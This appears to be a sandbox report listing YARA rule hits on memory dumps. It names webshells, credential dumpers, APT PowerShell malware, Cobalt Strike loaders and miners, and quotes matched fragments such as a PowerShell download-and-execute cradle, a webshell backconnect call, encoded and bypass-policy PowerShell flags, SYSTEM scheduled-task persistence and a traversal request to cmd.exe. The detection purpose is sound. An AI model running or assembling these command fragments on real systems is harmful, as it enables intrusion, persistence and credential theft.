0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x9d0:$a: Amplia Security |
0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0xbf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0xd38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);} |
0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x191d0:$a: Amplia Security
- 0x19180:$c: getlsasrvaddr.exe
- 0x26140:$d: Cannot get PID of LSASS.EXE
- 0x262c0:$e: extract the TGT session key |
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x2a6c8:$s1: except SqlmapBaseException, ex: |
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x25d20:$s0: Auto Scroll BOTH Text Boxes
- 0x25f90:$s4: Start/Stop Portscanning
- 0x2a348:$s6: Auto Save LogFile by pressing STOP |
00000013.00000003.473985141.0000000006BA5000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x8818:$x5: p0wnedShellx64 |
00000013.00000003.428708026.0000000006BA5000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x8818:$x5: p0wnedShellx64 |
00000013.00000003.436058475.0000000006B94000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x7220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc |
00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip'] |
00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); |
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0x2cf86:$sa2: -EncodedCommand
- 0x2cf74:$sc1: -nop
- 0x2cf79:$se2: -exec bypass
- 0x2cf79:$se4: -exec bypass |
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp | WiltedTulip_ReflectiveLoader | Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Florian Roth | - 0x2cf6a:$x1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x2cfa0:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x2cf39:$x5: Failed to impersonate logged on user %d (%u) |
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.312404128.0000000006667000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x5558:$x5: p0wnedShellx64 |
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0xa7e:$s11: elatedmonkey
- 0x656:$elf4: charm_saver
- 0xf76:$elf8: ebbshave
- 0xd96:$elf9: eggbasket
- 0xa47:$elf17: ghost_sparc
- 0xeae:$elf18: jackpop
- 0x656:$pe2: charm_saver
- 0xa53:$pe3: ghost_x86 |
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x1e90:$s1: <option value="cat /etc/passwd">/etc/passwd</option> |
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x1e90:$s13: <option value="cat /etc/passwd">/etc/passwd</option> |
00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0xdd8:$php: <?
- 0xdde:$payload3: eval(gzuncompress(base64_decode( |
00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0xdd8:$s0: <?php eval(gzuncompress(base64_decode(" |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_Lazagne_Gen_18 | Detects Lazagne password extractor hacktool | Florian Roth | - 0x8b74:$x1: lazagne.config.powershell_execute(
- 0x8b9b:$x2: creddump7.win32.
- 0x8bb0:$x3: lazagne.softwares.windows.hashdump
- 0x8bd7:$x4: .softwares.memory.libkeepass.common( |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_NoPowerShell | Detects NoPowerShell hack tool | Florian Roth | - 0x7f19:$x1: \NoPowerShell.pdb |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_LNX_Pnscan | Detects Pnscan port scanner | Florian Roth | - 0x2acc:$x1: -R<hex list> Hex coded response string to look for.
- 0x2b06:$x2: This program implements a multithreaded TCP port scanner. |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | SUSP_Script_Obfuscation_Char_Concat | Detects strings found in sample from CN group repo leak in October 2018 | Florian Roth | - 0xb2ce:$s1: "c" & "r" & "i" & "p" & "t" |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth | - 0x39ce:$x1: netsh interface portproxy add v4tov4 listenport= |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | MAL_HawkEye_Keylogger_Gen_Dec18 | Detects HawkEye Keylogger Reborn | Florian Roth | - 0x8d8e:$s2: _ScreenshotLogger
- 0x8da4:$s3: _PasswordStealer |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | VUL_JQuery_FileUpload_CVE_2018_9206 | Detects JQuery File Upload vulnerability CVE-2018-9206 | Florian Roth | - 0xa0a8:$s1: error_reporting(E_ALL | E_STRICT);
- 0xa0cf:$s2: require('UploadHandler.php');
- 0xa0f1:$s3: $upload_handler = new UploadHandler(); |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_FIN7_Strings_Aug18_1 | Detects strings from FIN7 report in August 2018 | Florian Roth | - 0xd807:$s1: &&call %a01%%a02% /e:jscript
- 0xd828:$s2: wscript.exe //b /e:jscript %TEMP%
- 0xd84e:$s3: w=wsc@ript /b
- 0xd862:$s4: @echo %w:@=%|cmd
- 0xd877:$s5: & wscript //b /e:jscript |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_FIN7_MalDoc_Aug18_1 | Detects malicious Doc from FIN7 campaign | Florian Roth | - 0xdcfd:$s1: <photoshop:LayerText>If this document was downloaded from your email, please click "Enable editing" from the yellow bar above |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_PowerKatz_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x63c0:$x1: Powerkatz32
- 0x63d0:$x2: Powerkatz64
- 0x63e0:$s1: GetData: not found taskName
- 0x6400:$s2: GetRes Ex: |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_Unknown_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x6572:$x1: not a valid timeout format!
- 0x6592:$x2: host can not be empty!
- 0x65ad:$x3: not a valid port format!
- 0x65ca:$x4: {0} - {1} TTL={2} time={3}
- 0x65e9:$x5: ping count is not a correct format!
- 0x6611:$s1: The result is too large,program store to '{0}'.Please download it manully.
- 0x6660:$s2: C:\Windows\temp\ |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0xe0d2:$sb1: -w Hidden
- 0xe0af:$sc1: -NoP
- 0xe0b4:$sd1: -NonI
- 0x4067:$se2: -exec bypass
- 0xe0ba:$se3: -ExecutionPolicy Bypass
- 0x4067:$se4: -exec bypass |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_1 | Detects APT34 PowerShell malware | Florian Roth | - 0x3b83:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3de4:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3bd9:$x2: Write-Host "excepton occured!"
- 0x3bfc:$s1: Start-Sleep -s 1;
- 0x3c12:$s2: Start-Sleep -m 100; |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_2 | Detects APT34 PowerShell malware | Florian Roth | - 0x3daa:$x1: = "http://" + [System.Net.Dns]::GetHostAddresses("
- 0x3de1:$x2: $t = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3e3a:$x3: | Where { $_ -notmatch '^\s+$' }
- 0x3e5f:$s1: = new-object System.Net.WebProxy($u, $true);
- 0x3e90:$s2: -eq "dom"){$
- 0x3ea2:$s3: -eq "srv"){$
- 0x3eb4:$s4: +"<>" | Set-Content |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_3 | Detects APT34 PowerShell malware | Florian Roth | - 0x4059:$x1: Powershell.exe -exec bypass -file ${global:$address1}
- 0x4093:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn
- 0x40cc:$x3: "\UpdateTasks\UpdateTaskHosts"
- 0x40ef:$x4: wscript /b \`"${global:$address1
- 0x4114:$x5: ::FromBase64String([string]${global:$http_ag}))
- 0x4148:$x6: .run command1, 0, false" | Out-File
- 0x4171:$x7: \UpdateTask.vbs
- 0x4185:$x8: hUpdater.ps1 |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | PUA_CryptoMiner_Jan19_1 | Detects Crypto Miner strings | Florian Roth | - 0x6ec4:$s1: Stratum notify: invalid Merkle branch
- 0x6eee:$s2: -t, --threads=N number of miner threads (default: number of processors)
- 0x6f40:$s3: User-Agent: cpuminer/
- 0x6f5a:$s4: hash > target (false positive)
- 0x6f7d:$s5: thread %d: %lu hashes, %s khash/s |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_Dsniff | Detects Dsniff hack tool | Florian Roth | - 0x53bf:$x1: .*account.*|.*acct.*|.*domain.*|.*login.*|.*member.* |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1 | Detects HOPLIGHT malware used by HiddenCobra APT group | Florian Roth | - 0x42fe:$s1: www.naver.com
- 0x473c:$s1: www.naver.com
- 0x4310:$s2: PolarSSL Test CA0 |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | JoeSecurity_CryptoMiner | Yara detected Crypto Miner | Joe Security | |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security | |
0000000A.00000003.324847009.0000000006648000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x299e:$s2: Auditcleaner
- 0xece:$elf12: envoytomato
- 0xf2e:$elf14: estopmoonlit |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_Lazagne_Gen_18 | Detects Lazagne password extractor hacktool | Florian Roth | - 0x8b74:$x1: lazagne.config.powershell_execute(
- 0x8b9b:$x2: creddump7.win32.
- 0x8bb0:$x3: lazagne.softwares.windows.hashdump
- 0x8bd7:$x4: .softwares.memory.libkeepass.common( |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_NoPowerShell | Detects NoPowerShell hack tool | Florian Roth | - 0x7f19:$x1: \NoPowerShell.pdb |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_LNX_Pnscan | Detects Pnscan port scanner | Florian Roth | - 0x2acc:$x1: -R<hex list> Hex coded response string to look for.
- 0x2b06:$x2: This program implements a multithreaded TCP port scanner. |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | SUSP_Script_Obfuscation_Char_Concat | Detects strings found in sample from CN group repo leak in October 2018 | Florian Roth | - 0xb2ce:$s1: "c" & "r" & "i" & "p" & "t" |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth | - 0x39ce:$x1: netsh interface portproxy add v4tov4 listenport= |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | MAL_HawkEye_Keylogger_Gen_Dec18 | Detects HawkEye Keylogger Reborn | Florian Roth | - 0x8d8e:$s2: _ScreenshotLogger
- 0x8da4:$s3: _PasswordStealer |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | VUL_JQuery_FileUpload_CVE_2018_9206 | Detects JQuery File Upload vulnerability CVE-2018-9206 | Florian Roth | - 0xa0a8:$s1: error_reporting(E_ALL | E_STRICT);
- 0xa0cf:$s2: require('UploadHandler.php');
- 0xa0f1:$s3: $upload_handler = new UploadHandler(); |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_FIN7_Strings_Aug18_1 | Detects strings from FIN7 report in August 2018 | Florian Roth | - 0xd807:$s1: &&call %a01%%a02% /e:jscript
- 0xd828:$s2: wscript.exe //b /e:jscript %TEMP%
- 0xd84e:$s3: w=wsc@ript /b
- 0xd862:$s4: @echo %w:@=%|cmd
- 0xd877:$s5: & wscript //b /e:jscript |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_FIN7_MalDoc_Aug18_1 | Detects malicious Doc from FIN7 campaign | Florian Roth | - 0xdcfd:$s1: <photoshop:LayerText>If this document was downloaded from your email, please click "Enable editing" from the yellow bar above |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_PowerKatz_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x63c0:$x1: Powerkatz32
- 0x63d0:$x2: Powerkatz64
- 0x63e0:$s1: GetData: not found taskName
- 0x6400:$s2: GetRes Ex: |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_Unknown_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x6572:$x1: not a valid timeout format!
- 0x6592:$x2: host can not be empty!
- 0x65ad:$x3: not a valid port format!
- 0x65ca:$x4: {0} - {1} TTL={2} time={3}
- 0x65e9:$x5: ping count is not a correct format!
- 0x6611:$s1: The result is too large,program store to '{0}'.Please download it manully.
- 0x6660:$s2: C:\Windows\temp\ |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0xe0d2:$sb1: -w Hidden
- 0xe0af:$sc1: -NoP
- 0xe0b4:$sd1: -NonI
- 0x4067:$se2: -exec bypass
- 0xe0ba:$se3: -ExecutionPolicy Bypass
- 0x4067:$se4: -exec bypass |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_1 | Detects APT34 PowerShell malware | Florian Roth | - 0x3b83:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3de4:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3bd9:$x2: Write-Host "excepton occured!"
- 0x3bfc:$s1: Start-Sleep -s 1;
- 0x3c12:$s2: Start-Sleep -m 100; |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_2 | Detects APT34 PowerShell malware | Florian Roth | - 0x3daa:$x1: = "http://" + [System.Net.Dns]::GetHostAddresses("
- 0x3de1:$x2: $t = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3e3a:$x3: | Where { $_ -notmatch '^\s+$' }
- 0x3e5f:$s1: = new-object System.Net.WebProxy($u, $true);
- 0x3e90:$s2: -eq "dom"){$
- 0x3ea2:$s3: -eq "srv"){$
- 0x3eb4:$s4: +"<>" | Set-Content |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_3 | Detects APT34 PowerShell malware | Florian Roth | - 0x4059:$x1: Powershell.exe -exec bypass -file ${global:$address1}
- 0x4093:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn
- 0x40cc:$x3: "\UpdateTasks\UpdateTaskHosts"
- 0x40ef:$x4: wscript /b \`"${global:$address1
- 0x4114:$x5: ::FromBase64String([string]${global:$http_ag}))
- 0x4148:$x6: .run command1, 0, false" | Out-File
- 0x4171:$x7: \UpdateTask.vbs
- 0x4185:$x8: hUpdater.ps1 |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | PUA_CryptoMiner_Jan19_1 | Detects Crypto Miner strings | Florian Roth | - 0x6ec4:$s1: Stratum notify: invalid Merkle branch
- 0x6eee:$s2: -t, --threads=N number of miner threads (default: number of processors)
- 0x6f40:$s3: User-Agent: cpuminer/
- 0x6f5a:$s4: hash > target (false positive)
- 0x6f7d:$s5: thread %d: %lu hashes, %s khash/s |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_Dsniff | Detects Dsniff hack tool | Florian Roth | - 0x53bf:$x1: .*account.*|.*acct.*|.*domain.*|.*login.*|.*member.* |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1 | Detects HOPLIGHT malware used by HiddenCobra APT group | Florian Roth | - 0x42fe:$s1: www.naver.com
- 0x473c:$s1: www.naver.com
- 0x4310:$s2: PolarSSL Test CA0 |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | JoeSecurity_CryptoMiner | Yara detected Crypto Miner | Joe Security | |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security | |
0000000A.00000003.316213218.0000000006859000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x28af0:$c: getlsasrvaddr.exe
- 0x2c420:$e: extract the TGT session key |
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x3a6f0:$s1: except SqlmapBaseException, ex: |
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x2c090:$s0: Auto Scroll BOTH Text Boxes
- 0x2c4e0:$s4: Start/Stop Portscanning
- 0x3a6b8:$s6: Auto Save LogFile by pressing STOP |
0000000A.00000003.323605826.0000000006667000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x5558:$x5: p0wnedShellx64 |
00000013.00000003.433232225.00000000052E4000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x8f5e:$s2: Auditcleaner
- 0xa6a6:$s11: elatedmonkey
- 0xa716:$elf4: charm_saver
- 0x976e:$elf12: envoytomato
- 0x973e:$elf14: estopmoonlit
- 0xa8d7:$elf17: ghost_sparc
- 0xa1c6:$elf19: orleans_stride
- 0x9ec6:$elf21: seconddate
- 0xa716:$pe2: charm_saver
- 0xa8e3:$pe3: ghost_x86 |
00000013.00000003.413817784.00000000052A4000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x48f5e:$s2: Auditcleaner
- 0x4a6a6:$s11: elatedmonkey
- 0x4a716:$elf4: charm_saver
- 0x4976e:$elf12: envoytomato
- 0x4973e:$elf14: estopmoonlit
- 0x4a8d7:$elf17: ghost_sparc
- 0x4a1c6:$elf19: orleans_stride
- 0x49ec6:$elf21: seconddate
- 0x4a716:$pe2: charm_saver
- 0x4a8e3:$pe3: ghost_x86 |
00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x51cf:$a: Amplia Security
- 0x5347:$a: Amplia Security
- 0x5365:$c: getlsasrvaddr.exe
- 0x5385:$d: Cannot get PID of LSASS.EXE
- 0x53af:$e: extract the TGT session key
- 0x53d9:$f: PPWDUMP_DATA |
00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x5103:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 |
0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0xe90:$s1: <option value="cat /etc/passwd">/etc/passwd</option> |
0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0xe90:$s13: <option value="cat /etc/passwd">/etc/passwd</option> |
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x2faf0:$c: getlsasrvaddr.exe
- 0x33420:$e: extract the TGT session key |
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x416f0:$s1: except SqlmapBaseException, ex: |
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x33090:$s0: Auto Scroll BOTH Text Boxes
- 0x334e0:$s4: Start/Stop Portscanning
- 0x416b8:$s6: Auto Save LogFile by pressing STOP |
0000000A.00000003.318816470.000000000688B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x179d0:$a: Amplia Security |
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);} |
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.481677976.0000000006BA6000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x7818:$x5: p0wnedShellx64 |
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x179d0:$a: Amplia Security |
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);} |
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x67af0:$c: getlsasrvaddr.exe
- 0x6b420:$e: extract the TGT session key
- 0xaf90:$f: PPWDUMP_DATA |
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x796f0:$s1: except SqlmapBaseException, ex: |
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x6b090:$s0: Auto Scroll BOTH Text Boxes
- 0x6b4e0:$s4: Start/Stop Portscanning
- 0x796b8:$s6: Auto Save LogFile by pressing STOP |
0000000A.00000003.325411258.0000000006626000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0xa7e:$s11: elatedmonkey
- 0x656:$elf4: charm_saver
- 0xf76:$elf8: ebbshave
- 0xd96:$elf9: eggbasket
- 0xa47:$elf17: ghost_sparc
- 0xeae:$elf18: jackpop
- 0x656:$pe2: charm_saver
- 0xa53:$pe3: ghost_x86 |
00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0x12e80:$php: <?
- 0x15668:$php: <?
- 0x16959:$php: <?
- 0x18dd8:$php: <?
- 0x18dde:$payload3: eval(gzuncompress(base64_decode( |
00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x18dd8:$s0: <?php eval(gzuncompress(base64_decode(" |
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x7580:$a: Amplia Security |
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | Fierce2 | This signature detects the Fierce2 domain scanner | Florian Roth | - 0x7398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars, |
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x7758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x71b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de |
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | - 0x3c2f6:$s1: export buf=\ |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0x3c42f:$s1: & "\" & "svchost.exe"
- 0x3f71:$s2: CreateObject("Wscript.Shell")
- 0x3c449:$s2: CreateObject("Wscript.Shell")
- 0x3d6bf:$s2: CreateObject("Wscript.Shell")
- 0x3df17:$s2: CreateObject("Wscript.Shell")
- 0x3c46b:$s3: <% @language="VBScript" %> |
